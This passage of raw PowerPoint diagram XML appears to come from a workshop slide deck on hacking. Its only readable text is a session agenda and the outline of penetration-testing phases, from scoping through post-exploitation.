Target="../media/image25.png"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/drawing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svg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image40.svg"/></Relationships>
</file>

<file path=ppt/diagrams/_rels/drawing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svg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image67.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svg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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svg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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svg"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image43.png"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image42.svg"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image45.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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4BF89A-EC47-4E51-8FBC-CBEA0CBE176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15C296A-2972-42AC-B5DB-8E7F745B9A53}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Hacking: Tools and techniques</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{396BF6C0-4E03-4944-976F-3970990209D6}" type="parTrans" cxnId="{235736E5-3707-4D07-A2F3-75F5857BD1FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CAD98CC8-EEDE-44E2-B842-5661016C8029}" type="sibTrans" cxnId="{235736E5-3707-4D07-A2F3-75F5857BD1FC}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A1ED88D3-6B3A-4FEC-ADCF-499B9D560910}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7A1B607E-7A72-4A34-B48D-45AF0690AACB}" type="parTrans" cxnId="{AB061391-EE46-4018-A63E-8A6BEDAA4F89}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{967D9B3B-4E0B-4D5F-A0B5-D70221EDF5B6}" type="sibTrans" cxnId="{AB061391-EE46-4018-A63E-8A6BEDAA4F89}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{758D8FEE-DA5B-4A56-9981-890222B131B3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Lunch</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>(11:30 – 12:30)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C5933767-5A2F-488B-9835-4B7198F18726}" type="parTrans" cxnId="{6A550A0B-3946-4446-8F84-6FE2A73D313B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{665E2BD3-497E-4A10-ADD2-5E29C115804C}" type="sibTrans" cxnId="{6A550A0B-3946-4446-8F84-6FE2A73D313B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{104B7DAC-DFD7-4541-B39E-B04E6AFA52A6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Hack</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>(12:30 – 1:30)</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9828392-FA84-4015-909B-2FA59DB9085E}" type="parTrans" cxnId="{459E0285-29D8-432A-8CDC-BBB4B3565896}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{365D475A-3ABD-4C36-B65A-DAA97E567C2D}" type="sibTrans" cxnId="{459E0285-29D8-432A-8CDC-BBB4B3565896}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{583B27F7-A35F-4987-83A4-42D558D1ED5B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E5C2389A-54F1-42B7-B846-11FC4088EDA5}" type="parTrans" cxnId="{AA9DB095-099C-4704-AC37-D5992EA58611}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A265ACE3-5DEF-41D4-A390-5C6D59982A62}" type="sibTrans" cxnId="{AA9DB095-099C-4704-AC37-D5992EA58611}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C8A37CA9-C296-4749-9B7C-1D43ACEDFE09}" type="pres">
      <dgm:prSet presAssocID="{144BF89A-EC47-4E51-8FBC-CBEA0CBE1760}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{35CE1B12-989A-4D89-8574-E03110082519}" type="pres">
      <dgm:prSet presAssocID="{C15C296A-2972-42AC-B5DB-8E7F745B9A53}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{78065451-218E-4252-88E2-7D9664E4A168}" type="pres">
      <dgm:prSet presAssocID="{C15C296A-2972-42AC-B5DB-8E7F745B9A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ogrammer"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{686784CB-14A7-4488-90B8-03BFBFC57B32}" type="pres">
      <dgm:prSet presAssocID="{C15C296A-2972-42AC-B5DB-8E7F745B9A53}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{FBE2E15B-5329-453A-B4DE-08F51F70E372}" type="pres">
      <dgm:prSet presAssocID="{C15C296A-2972-42AC-B5DB-8E7F745B9A53}" presName="textRect" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{96E46636-FD0C-4EC6-880A-00A5F050315A}" type="pres">
      <dgm:prSet presAssocID="{CAD98CC8-EEDE-44E2-B842-5661016C8029}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{44D9ABEF-D604-4723-85A5-32B7BEB8EB7C}" type="pres">
      <dgm:prSet presAssocID="{758D8FEE-DA5B-4A56-9981-890222B131B3}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{F940134A-B307-4531-8786-1E696B0E2FAC}" type="pres">
      <dgm:prSet presAssocID="{758D8FEE-DA5B-4A56-9981-890222B131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k and knife"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{71ABEB99-F928-42BB-9626-E5DB4FEEED12}" type="pres">
      <dgm:prSet presAssocID="{758D8FEE-DA5B-4A56-9981-890222B131B3}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4AA82742-9F16-4EAA-AFEF-9C0845121DA2}" type="pres">
      <dgm:prSet presAssocID="{758D8FEE-DA5B-4A56-9981-890222B131B3}" presName="textRect" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{973B75A5-476C-42AE-802D-02E2C0EDC066}" type="pres">
      <dgm:prSet presAssocID="{665E2BD3-497E-4A10-ADD2-5E29C115804C}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{7A76BE82-9773-4A47-A52C-9D64FB3AB5BC}" type="pres">
      <dgm:prSet presAssocID="{104B7DAC-DFD7-4541-B39E-B04E6AFA52A6}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{A2530889-7285-4DFE-A702-B5937D2F6CB5}" type="pres">
      <dgm:prSet presAssocID="{104B7DAC-DFD7-4541-B39E-B04E6AFA52A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evil face with solid fill"/>
        </a:ext>
      </dgm:extLst>
    </dgm:pt>
    <dgm:pt modelId="{EBDF462D-F958-450E-A92D-B3A9A8FBBA52}" type="pres">
      <dgm:prSet presAssocID="{104B7DAC-DFD7-4541-B39E-B04E6AFA52A6}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D06A265D-9E33-49F1-BFA1-901D425A92E8}" type="pres">
      <dgm:prSet presAssocID="{104B7DAC-DFD7-4541-B39E-B04E6AFA52A6}" presName="textRect" presStyleLbl="revTx" presStyleIdx="2" presStyleCnt="3">
        <dgm:presLayoutVars>
          <dgm:chMax val="1"/>
          <dgm:chPref val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{6A550A0B-3946-4446-8F84-6FE2A73D313B}" srcId="{144BF89A-EC47-4E51-8FBC-CBEA0CBE1760}" destId="{758D8FEE-DA5B-4A56-9981-890222B131B3}" srcOrd="1" destOrd="0" parTransId="{C5933767-5A2F-488B-9835-4B7198F18726}" sibTransId="{665E2BD3-497E-4A10-ADD2-5E29C115804C}"/>
    <dgm:cxn modelId="{459E0285-29D8-432A-8CDC-BBB4B3565896}" srcId="{144BF89A-EC47-4E51-8FBC-CBEA0CBE1760}" destId="{104B7DAC-DFD7-4541-B39E-B04E6AFA52A6}" srcOrd="2" destOrd="0" parTransId="{C9828392-FA84-4015-909B-2FA59DB9085E}" sibTransId="{365D475A-3ABD-4C36-B65A-DAA97E567C2D}"/>
    <dgm:cxn modelId="{AB061391-EE46-4018-A63E-8A6BEDAA4F89}" srcId="{C15C296A-2972-42AC-B5DB-8E7F745B9A53}" destId="{A1ED88D3-6B3A-4FEC-ADCF-499B9D560910}" srcOrd="0" destOrd="0" parTransId="{7A1B607E-7A72-4A34-B48D-45AF0690AACB}" sibTransId="{967D9B3B-4E0B-4D5F-A0B5-D70221EDF5B6}"/>
    <dgm:cxn modelId="{AA9DB095-099C-4704-AC37-D5992EA58611}" srcId="{104B7DAC-DFD7-4541-B39E-B04E6AFA52A6}" destId="{583B27F7-A35F-4987-83A4-42D558D1ED5B}" srcOrd="0" destOrd="0" parTransId="{E5C2389A-54F1-42B7-B846-11FC4088EDA5}" sibTransId="{A265ACE3-5DEF-41D4-A390-5C6D59982A62}"/>
    <dgm:cxn modelId="{BBDB409F-7589-1340-86BF-D113CEFD1B26}" type="presOf" srcId="{758D8FEE-DA5B-4A56-9981-890222B131B3}" destId="{4AA82742-9F16-4EAA-AFEF-9C0845121DA2}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{0ED2EDB5-614A-AD45-95D7-4B8AAB106444}" type="presOf" srcId="{144BF89A-EC47-4E51-8FBC-CBEA0CBE1760}" destId="{C8A37CA9-C296-4749-9B7C-1D43ACEDFE09}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{66073FCC-E115-DE4C-9B0A-8474211A9CE5}" type="presOf" srcId="{C15C296A-2972-42AC-B5DB-8E7F745B9A53}" destId="{FBE2E15B-5329-453A-B4DE-08F51F70E372}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{235736E5-3707-4D07-A2F3-75F5857BD1FC}" srcId="{144BF89A-EC47-4E51-8FBC-CBEA0CBE1760}" destId="{C15C296A-2972-42AC-B5DB-8E7F745B9A53}" srcOrd="0" destOrd="0" parTransId="{396BF6C0-4E03-4944-976F-3970990209D6}" sibTransId="{CAD98CC8-EEDE-44E2-B842-5661016C8029}"/>
    <dgm:cxn modelId="{C24612EC-3A9C-914D-A070-F338B899FE11}" type="presOf" srcId="{104B7DAC-DFD7-4541-B39E-B04E6AFA52A6}" destId="{D06A265D-9E33-49F1-BFA1-901D425A92E8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{FA6B4262-01AF-6942-93B2-24051156EC9A}" type="presParOf" srcId="{C8A37CA9-C296-4749-9B7C-1D43ACEDFE09}" destId="{35CE1B12-989A-4D89-8574-E03110082519}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{2E9974D9-4CED-E345-8E31-82B5E13F2CE6}" type="presParOf" srcId="{35CE1B12-989A-4D89-8574-E03110082519}" destId="{78065451-218E-4252-88E2-7D9664E4A168}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{470B7EFB-60B4-8644-8D01-A1C9A884D96F}" type="presParOf" srcId="{35CE1B12-989A-4D89-8574-E03110082519}" destId="{686784CB-14A7-4488-90B8-03BFBFC57B32}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{1F57E195-6FA8-EB4B-8055-6E03F10FE48A}" type="presParOf" srcId="{35CE1B12-989A-4D89-8574-E03110082519}" destId="{FBE2E15B-5329-453A-B4DE-08F51F70E372}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{182E1D8A-3B59-8546-BE33-DF9D6FCFBEAB}" type="presParOf" srcId="{C8A37CA9-C296-4749-9B7C-1D43ACEDFE09}" destId="{96E46636-FD0C-4EC6-880A-00A5F050315A}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{390E89E0-BA23-D243-817C-60E2E9C3BA64}" type="presParOf" srcId="{C8A37CA9-C296-4749-9B7C-1D43ACEDFE09}" destId="{44D9ABEF-D604-4723-85A5-32B7BEB8EB7C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{3E52E439-F33C-9448-82EB-C0C7FE3011F4}" type="presParOf" srcId="{44D9ABEF-D604-4723-85A5-32B7BEB8EB7C}" destId="{F940134A-B307-4531-8786-1E696B0E2FAC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{0FBC363F-0E2F-4A41-B139-43261316B77B}" type="presParOf" srcId="{44D9ABEF-D604-4723-85A5-32B7BEB8EB7C}" destId="{71ABEB99-F928-42BB-9626-E5DB4FEEED12}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{64E87130-8B15-C945-8A11-C2A2D61B7D5D}" type="presParOf" srcId="{44D9ABEF-D604-4723-85A5-32B7BEB8EB7C}" destId="{4AA82742-9F16-4EAA-AFEF-9C0845121DA2}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{73BD7224-FCEF-5F49-AB18-34F0CCB4C421}" type="presParOf" srcId="{C8A37CA9-C296-4749-9B7C-1D43ACEDFE09}" destId="{973B75A5-476C-42AE-802D-02E2C0EDC066}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{3D927DC8-E647-B24B-9D6F-D2E60FBAFE5F}" type="presParOf" srcId="{C8A37CA9-C296-4749-9B7C-1D43ACEDFE09}" destId="{7A76BE82-9773-4A47-A52C-9D64FB3AB5BC}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{E3D127EE-CB40-E14F-B9A0-2F85A0442A10}" type="presParOf" srcId="{7A76BE82-9773-4A47-A52C-9D64FB3AB5BC}" destId="{A2530889-7285-4DFE-A702-B5937D2F6CB5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{B85D36FC-F4F8-2747-955B-79C3D180F82D}" type="presParOf" srcId="{7A76BE82-9773-4A47-A52C-9D64FB3AB5BC}" destId="{EBDF462D-F958-450E-A92D-B3A9A8FBBA52}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2018/2/layout/IconLabelList"/>
    <dgm:cxn modelId="{B755B6D8-9199-2F43-A5F2-2BAE03E8F32F}" type="presParOf" srcId="{7A76BE82-9773-4A47-A52C-9D64FB3AB5BC}" destId="{D06A265D-9E33-49F1-BFA1-901D425A92E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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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a:solidFill>
          <a:schemeClr val="accent1">
            <a:lumMod val="50000"/>
          </a:schemeClr>
        </a:solidFill>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3506AA-5689-4C9D-9A7F-70B535246B6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17F54DA-8C45-4223-B231-339957B36A2A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Scope and Rules of Engagement</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{387C6D98-AD22-45C7-BEEB-9A04A44E216F}" type="parTrans" cxnId="{84406DFC-50FF-4F4F-A773-427DFC387A30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1782390C-690A-4EEA-B7C4-6D5C891A5D19}" type="sibTrans" cxnId="{84406DFC-50FF-4F4F-A773-427DFC387A30}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E17E2263-F438-4344-BD40-B5111BADF318}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Scanning and Enumeration</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{66526FCD-C377-4E89-926B-0921F4DE675A}" type="parTrans" cxnId="{890BDEBF-97A2-44F2-958A-5B9B671EC26F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6CDF4AF5-96BD-4A9A-B4FA-2B339C94E575}" type="sibTrans" cxnId="{890BDEBF-97A2-44F2-958A-5B9B671EC26F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0D6E05D6-398A-47DF-B653-D5FB9980E9F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Exploitation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E34FCC54-B2D4-46B6-A2E9-46D2F96049CC}" type="parTrans" cxnId="{58AFCCC6-A51C-4B45-9AAA-99E76CB15013}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6EEA2C49-A7CC-4181-90A7-CB06D83A47AA}" type="sibTrans" cxnId="{58AFCCC6-A51C-4B45-9AAA-99E76CB15013}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{72159D35-FF57-4E45-ACB4-AA6DEADA1563}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Privilege Escalation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{40365E31-220F-48C0-8880-E47FCADBA352}" type="parTrans" cxnId="{E199E815-F78B-446F-B118-C3C11BD05D84}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{14C0234E-3CA8-4927-86B8-BEF58A01B864}" type="sibTrans" cxnId="{E199E815-F78B-446F-B118-C3C11BD05D84}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F5141ED3-8E99-40EB-9623-5CBAF7F45152}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr>
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US"/>
            <a:t>Pillaging and Post Exploitation</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{51F4F7FE-9213-41D6-8C4C-A5BA35DCE866}" type="parTrans" cxnId="{5A668564-E6DE-4497-98D8-BD0A26693ADE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F8487A0C-C894-481C-94E5-D04659FD306C}" type="sibTrans" cxnId="{5A668564-E6DE-4497-98D8-BD0A26693ADE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{85756820-9E1C-4DAB-A04C-C72059E4170F}" type="pres">
      <dgm:prSet presAssocID="{CD3506AA-5689-4C9D-9A7F-70B535246B6D}" presName="root" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2592946B-61BA-46ED-881D-9DA483A16A44}" type="pres">
      <dgm:prSet presAssocID="{017F54DA-8C45-4223-B231-339957B36A2A}" presName="compNode" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8DD4F3DC-D491-4459-8D5C-A055C70E6E87}" type="pres">
      <dgm:prSet presAssocID="{017F54DA-8C45-4223-B231-339957B36A2A}" presName="bgRect" presStyleLbl="bgShp" presStyleIdx="0" presStyleCnt="5"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{B5676437-86DB-485F-9635-BD51C998B2E6}" type="pres">
      <dgm:prSet presAssocID="{017F54DA-8C45-4223-B231-339957B36A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4185D61E-F9A5-46BE-A5F7-25AB46FA98AD}" type="pres">
      <dgm:prSet presAssocID="{017F54DA-8C45-4223-B231-339957B36A2A}" presName="spaceRect" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D6B256F9-1A75-40CB-BCBE-8A9F26E2838C}" type="pres">
      <dgm:prSet presAssocID="{017F54DA-8C45-4223-B231-339957B36A2A}" presName="parTx" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="5">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{4CCB4225-02F4-4A7D-9B45-B23DE49547CA}" type="pres">
